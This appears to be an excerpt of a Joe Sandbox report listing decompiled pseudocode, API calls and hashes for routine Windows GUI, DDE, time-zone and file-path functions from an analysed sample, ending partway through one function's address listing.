Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004215FF, Relevance: 9.1, APIs: 6, Instructions: 53
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v532;
				void* __ebp;
				long _t19;
				void* _t23;
				void* _t27;

				_push( &_v8);
				_push( &_v12);
				_push(_a8);
				_t27 = __ecx;
				_push(0x3e8);
				L0040C37C();
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
				_t19 = GlobalUnlock(_v8);
				_push(_v8);
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push(_a8);
				L0040C376();
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
				if(E004166B3(_t27) != 0) {
					_t23 = E00424BFB();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
				}
				return 0;
			}

0x0042160e
0x00421612
0x00421618
0x0042161b
0x0042161d
0x0042161e
0x00421639
0x00421642
0x00421648
0x00421650
0x00421655
0x00421656
0x00421657
0x0042165a
0x00421667
0x00421679
0x0042167b
0x0042168e
0x0042168e
0x00421697

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
GlobalLock.KERNEL32 ref: 00421626
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
GlobalUnlock.KERNEL32(?), ref: 00421642
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
PostMessageA.USER32 ref: 00421667

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8B4, Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8B4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E0041A759(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E0041A759(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
						}
					}
				}
				return _t3;
			}

0x0041a8b7
0x0041a8bd
0x0041a8c1
0x0041a8c3
0x0041a8c9
0x0041a8db
0x0041a8f2
0x0041a8f4
0x0041a915
0x00000000
0x0041a91f
0x0041a907
0x0041a90b
0x0041a913
0x00000000
0x00000000
0x0041a8dd
0x0041a8de
0x0041a8e0
0x0041a8e4
0x0041a8e9
0x0041a8f0
0x00000000
0x00000000
0x0041a8f0
0x0041a8e4
0x0041a8db
0x0041a8c9
0x0041a928

APIs

GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

GetParent.USER32(00000000), ref: 0041A8DE

Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

GetWindowLongA.USER32 ref: 0041A8F9
GetParent.USER32(?), ref: 0041A907
GetDesktopWindow.USER32 ref: 0041A90B
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041A91F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7CE, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}

0x0041a7dd
0x0041a7e9
0x0041a7eb
0x0041a7ee
0x0041a7f0
0x0041a7f4
0x00000000
0x00000000
0x0041a801
0x0041a832
0x0041a832
0x0041a834
0x00000000
0x0041a813
0x0041a818
0x0041a81e
0x0041a830
0x00000000
0x0041a837
0x00000000
0x0041a830
0x0041a801
0x00000000

APIs

ClientToScreen.USER32(?,?), ref: 0041A7DD
GetWindow.USER32(?,00000005), ref: 0041A7EE
GetDlgCtrlID.USER32 ref: 0041A7F7
GetWindowLongA.USER32 ref: 0041A806
GetWindowRect.USER32 ref: 0041A818
PtInRect.USER32(?,?,?), ref: 0041A828

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A586, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A586() {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t39;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E004079D4(_t70);
				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
				 *0x439f08 = 0;
				 *_t80 = 0x42f6a8;
				_t74 = E0040B475();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E00407A35(_t70);
					} else {
						_t19 =  *0x439fbc; // 0x0
						if(_t19 == 0) {
							L18:
							E004062E0( *0x439fbc);
							_t23 = E00405667(E00405A40(_t74) + 1);
							 *0x439fbc = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E00409B00(_t23, _t74);
								E00407A35(_t70);
								E0040AD30( *0x4373bc, _t74, 3);
								_t27 =  *0x4373bc; // 0x43733c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E004068F6(_t56, _t76) * 0xe10;
								 *0x437330 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E004068F6(_t60, _t76);
									_t63 =  *0x437330; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x437330 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E004068F6(_t60, _t76);
										_t65 =  *0x437330; // 0x7080
										_t60 = _t65 + _t35;
										 *0x437330 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x437330 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x437334 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E0040AD30( *0x4373c0, _t76, 3);
									_t18 =  *0x4373c0; // 0x43737c
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E00409A70(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E00407A35(_t70);
					 *_t80 = 0x439f10;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t39 =  *0x439f10; // 0x0
						_t67 =  *0x439f64; // 0x0
						_t40 = _t39 * 0x3c;
						_t86 =  *0x439f56; // 0x0
						_t68 = 1;
						 *0x437330 = _t40;
						 *0x439f08 = _t68;
						if(_t86 != 0) {
							 *0x437330 = _t40 + _t67 * 0x3c;
						}
						_t88 =  *0x439faa; // 0x0
						if(_t88 == 0) {
							L7:
							 *0x437334 = 0;
							 *0x437338 = 0;
						} else {
							_t47 =  *0x439fb8; // 0x0
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x437334 = _t68;
								 *0x437338 = (_t47 - _t67) * 0x3c;
							}
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							_t43 =  *0x4373bc; // 0x43733c
							 *_t43 =  *_t43 & 0x00000000;
						} else {
							_t46 =  *0x4373bc; // 0x43733c
							_t46[0x3f] = _t46[0x3f] & 0x00000000;
						}
						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
							L40:
							_t18 =  *0x4373c0; // 0x43737c
							 *_t18 =  *_t18 & 0x00000000;
						} else {
							_t18 =  *0x4373c0; // 0x43737c
							_t18[0x3f] = _t18[0x3f] & 0x00000000;
						}
					}
				}
				return _t18;
			}

0x0040a58a
0x0040a590
0x0040a594
0x0040a597
0x0040a59c
0x0040a5a3
0x0040a5aa
0x0040a5b0
0x0040a5bc
0x0040a5be
0x0040a5c1
0x0040a6c7
0x0040a801
0x0040a802
0x0040a6cd
0x0040a6cd
0x0040a6d4
0x0040a6e7
0x0040a6ed
0x0040a6fa
0x0040a704
0x0040a709
0x00000000
0x0040a70f
0x0040a711
0x0040a717
0x0040a725
0x0040a72a
0x0040a72f
0x0040a735
0x0040a73c
0x0040a73e
0x0040a745
0x0040a745
0x0040a751
0x0040a757
0x0040a75d
0x0040a75d
0x0040a761
0x00000000
0x00000000
0x0040a76b
0x0040a76b
0x0040a771
0x0040a773
0x0040a775
0x0040a77e
0x0040a784
0x0040a786
0x0040a78c
0x0040a78c
0x0040a790
0x00000000
0x00000000
0x0040a796
0x0040a796
0x0040a79c
0x0040a79e
0x0040a7a0
0x0040a7a6
0x0040a7ac
0x0040a7ae
0x0040a7b4
0x0040a7b4
0x0040a7b8
0x00000000
0x00000000
0x0040a7be
0x0040a7be
0x0040a7b4
0x0040a79c
0x0040a7c1
0x0040a7c5
0x0040a7c9
0x0040a7c9
0x0040a7cf
0x0040a7d4
0x0040a7d9
0x00000000
0x0040a7db
0x0040a7e4
0x0040a7e9
0x0040a7f1
0x0040a7f1
0x0040a7d9
0x0040a6d6
0x0040a6d8
0x0040a6e0
0x0040a6e1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a6e1
0x0040a6d4
0x0040a5c7
0x0040a5c8
0x0040a5cd
0x0040a5d4
0x0040a5dd
0x0040a5e3
0x0040a5e8
0x0040a5ee
0x0040a5f1
0x0040a5fa
0x0040a5fb
0x0040a600
0x0040a606
0x0040a60f
0x0040a60f
0x0040a614
0x0040a61b
0x0040a638
0x0040a638
0x0040a63e
0x0040a61d
0x0040a61d
0x0040a624
0x00000000
0x0040a626
0x0040a628
0x0040a631
0x0040a631
0x0040a624
0x0040a66e
0x0040a680
0x0040a685
0x0040a675
0x0040a675
0x0040a67a
0x0040a67a
0x0040a6a7
0x0040a7f7
0x0040a7f7
0x0040a7fc
0x0040a6b6
0x0040a6b6
0x0040a6bb
0x0040a6bb
0x0040a6a7
0x0040a5dd
0x0040a80c

APIs

Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C

Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42

GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3

Strings

|sC, xrefs: 0040A6B6, 0040A7E9, 0040A7F7
<sC, xrefs: 0040A675, 0040A680, 0040A72A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
String ID: <sC$|sC
API String ID: 3442286286-4181122796
Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413E4C(intOrPtr* __ecx) {
				struct HWND__* _v36;
				struct HWND__* _v40;
				signed char _v44;
				void* _v48;
				long _t33;
				long _t41;
				struct HWND__* _t46;
				signed char _t58;
				intOrPtr* _t61;
				signed int _t62;
				void* _t67;
				intOrPtr _t69;
				intOrPtr* _t70;

				_t70 = __ecx;
				_t67 = E004126FB();
				if(_t67 != 0) {
					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
						 *((intOrPtr*)(_t67 + 0x20)) = 0;
					}
				}
				_t61 =  *((intOrPtr*)(_t70 + 0x30));
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 0x50))();
					 *((intOrPtr*)(_t70 + 0x30)) = 0;
				}
				_t62 =  *(_t70 + 0x34);
				_t58 = 1;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 4))(_t58);
				}
				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
				if(( *(_t70 + 0x24) & _t58) != 0) {
					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
						E00406330( &_v48, 0, 0x2c);
						_t46 =  *(_t70 + 0x1c);
						_v40 = _t46;
						_v36 = _t46;
						_v48 = 0x28;
						_v44 = _t58;
						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
					}
				}
				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
				E004136A7(_t70);
				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
					if(_t41 != 0) {
						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
					}
				}
				E004137BE(_t70);
				return  *((intOrPtr*)( *_t70 + 0xa4))();
			}

0x00413e55
0x00413e5c
0x00413e62
0x00413e67
0x00413e8c
0x00413e8c
0x00413e92
0x00413e94
0x00413e94
0x00413e92
0x00413e97
0x00413e9c
0x00413ea0
0x00413ea3
0x00413ea3
0x00413ea6
0x00413ead
0x00413eae
0x00413eb3
0x00413eb3
0x00413eb6
0x00413ebd
0x00413ec4
0x00413ecc
0x00413edc
0x00413ee1
0x00413ee7
0x00413eea
0x00413ef0
0x00413eff
0x00413f05
0x00413f05
0x00413ecc
0x00413f16
0x00413f1c
0x00413f2a
0x00413f36
0x00413f3a
0x00413f42
0x00413f42
0x00413f3a
0x00413f4a
0x00413f5d

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00413F05
GetWindowLongA.USER32 ref: 00413F16
GetWindowLongA.USER32 ref: 00413F26
SetWindowLongA.USER32 ref: 00413F42

Strings

(, xrefs: 00413EF0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004264D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004264D7(void* __ecx, void* __eflags) {
				CHAR* _v8;
				char _v268;
				char _v528;
				char _v784;
				void* __ebp;
				signed char* _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				CHAR* _t54;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;

				_t55 = __ecx;
				_t64 = __ecx;
				_t62 = E00424BFB();
				 *(_t62 + 8) =  *(_t64 + 0x68);
				 *(_t62 + 0xc) =  *(_t64 + 0x68);
				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
				_t35 = E004072C1(_t55,  &_v528, 0x2e);
				 *_t35 =  *_t35 & 0x00000000;
				_v8 = _t35;
				E004265F4( &_v528,  &_v268, 0x104);
				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
				}
				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t64 + 0x88)));
					} else {
						_push( &_v784);
					}
					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
				}
				_t39 =  *((intOrPtr*)(_t64 + 0x78));
				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
				_t63 = _t64 + 0x8c;
				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
					_t54 = _v8;
					lstrcpyA(_t54, ".HLP");
					_t39 = E004065EE( &_v528);
					 *_t63 = _t39;
					 *_t54 =  *_t54 & 0x00000000;
				}
				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
					lstrcatA( &_v268, ".INI");
					_t43 = E004065EE( &_v268);
					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
					return _t43;
				}
				return _t39;
			}

0x004264d7
0x004264e3
0x004264ea
0x004264f4
0x004264fa
0x00426508
0x00426517
0x0042651c
0x00426521
0x00426533
0x00426540
0x0042654f
0x0042654f
0x00426558
0x00426572
0x0042657d
0x00426574
0x0042657a
0x0042657a
0x00426589
0x00426589
0x0042658c
0x0042658f
0x00426598
0x0042659e
0x004265a0
0x004265a9
0x004265b6
0x004265bb
0x004265bd
0x004265c0
0x004265c8
0x004265d6
0x004265e3
0x004265e9
0x00000000
0x004265e9
0x004265f3

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508

Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B

lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

.INI, xrefs: 004265D0
.HLP, xrefs: 004265A3

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E0041BA31(0);
				_t23 = E0041BBD7(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E0041BA31(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

0x0041ba6d
0x0041ba70
0x0041ba73
0x0041ba7d
0x0041ba82
0x0041ba86
0x0041ba89
0x0041baa3
0x0041baa5
0x0041baa7
0x0041baa7
0x0041baa7
0x0041baad
0x0041baaf
0x0041bab2
0x0041bab6
0x0041bab9
0x0041babe
0x0041bac5
0x0041bac5
0x0041babe
0x0041bac7
